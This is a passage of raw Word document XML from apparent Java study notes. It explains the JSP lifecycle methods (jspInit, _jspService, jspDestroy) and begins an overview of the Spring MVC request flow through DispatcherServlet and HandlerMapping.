            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="533E5BED"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6️</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Request Handling (_jspService())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A597C73"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Called for each client request — handles dynamic content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="1038F405" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D77E4AE"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7️</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⃣</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Destruction (jspDestroy())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B8CB642"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Called once when JSP is removed/unloaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73F628F9" w14:textId="77777777" w:rsidR="000631FC"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351A859">
          <v:rect id="_x0000_i1935" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="458ECB66" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC"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Internally...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121DD41C"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Behind the scenes, your .jsp file becomes something like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5EF7A9"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public final class example_jsp extends HttpJspBase {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4FDECA"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public void _jspService(HttpServletRequest request, HttpServletResponse response) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622E7C4"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 HTML + Java logic here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542211C2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A102B39" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19570B31"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public void jspInit() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B551657"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 Initialization code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A46E2A5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C71A205" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6157A2"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public void jspDestroy() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076BB613"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 Cleanup code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A34B0AC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626A920C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71AEDA" w14:textId="77777777" w:rsidR="000631FC"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EB414E2">
          <v:rect id="_x0000_i1936" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4DA886" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC"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12"/>
        <w:gridCol w:w="3568"/>
        <w:gridCol w:w="3137"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="79C13DF1" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="274719E3" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DB8E105" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Called When</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="689D6890" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="521F87B2" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05723A65"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jspInit()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A36E147"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Once during initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="766D1730"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Allocate resources (e.g., DB setup)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="7200E66F" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EA589DD"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_jspService()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FA6A0BA"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Every time a request is made to the JSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4670D750"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Generates dynamic content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="64F36FB8" w14:textId="77777777" w:rsidTr="000631FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27953061"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jspDestroy()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="216DBD0D"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Once before JSP is unloaded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09FA5DF7" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC"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Cleanup, free resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A11DF60" w14:textId="77777777" w:rsidR="000631FC"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D91DE92">
          <v:rect id="_x0000_i1937" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB3578A" w14:textId="20CD773A" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC"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w:t>
      </w:r>
      <w:r w:rsidR="00C81EF1" w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D323806" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1764"/>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You </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>don’t override _jspService()</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly — the JSP engine does it for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C37C9" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="001B573F" w:rsidRDefault="000631FC" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1764"/>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You can override jspInit() and jspDestroy() for setup/cleanup logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061512A8" w14:textId="77777777" w:rsidR="000631FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000631F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01450EB">
          <v:rect id="_x0000_i1938" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79046887" w14:textId="3F24E96A" w:rsidR="00502122" w:rsidRPr="00CE4B95" w:rsidRDefault="00516033">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="393" w:name="_Toc196307873"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Spring MVC? Explain architecture of spring MVC</w:t>
      </w:r>
      <w:r w:rsidR="00502122" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="393"/>
    </w:p>
    <w:p w14:paraId="475BEF21" w14:textId="6C299AEE" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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What is Spring MVC?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF1ABDE"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Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Model-View-Controller) is a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web framework</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by the Spring Framework.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">It’s used to build </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java-based web applications</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by separating concerns into </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Model</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5B262F" w14:textId="77777777" w:rsidR="003158C2"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6265BC0">
          <v:rect id="_x0000_i1939" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D4BE4E" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2"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Spring MVC Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11957906"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Here’s how the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC flow</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> works step-by-step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E50A7FC" w14:textId="77777777" w:rsidR="003158C2"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89AC84A">
          <v:rect id="_x0000_i1940" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="674928FD" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2"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Spring MVC Request Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB665D2" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1765"/>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Client sends an HTTP Request</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧍➡️🌐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6D296A" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1765"/>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The request is intercepted by the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Front Controller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DAB8BB" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1765"/>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It consults the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find the right </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED7CBB" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1765"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The selected </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method is invoked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D6DE84" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1765"/>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The Controller returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
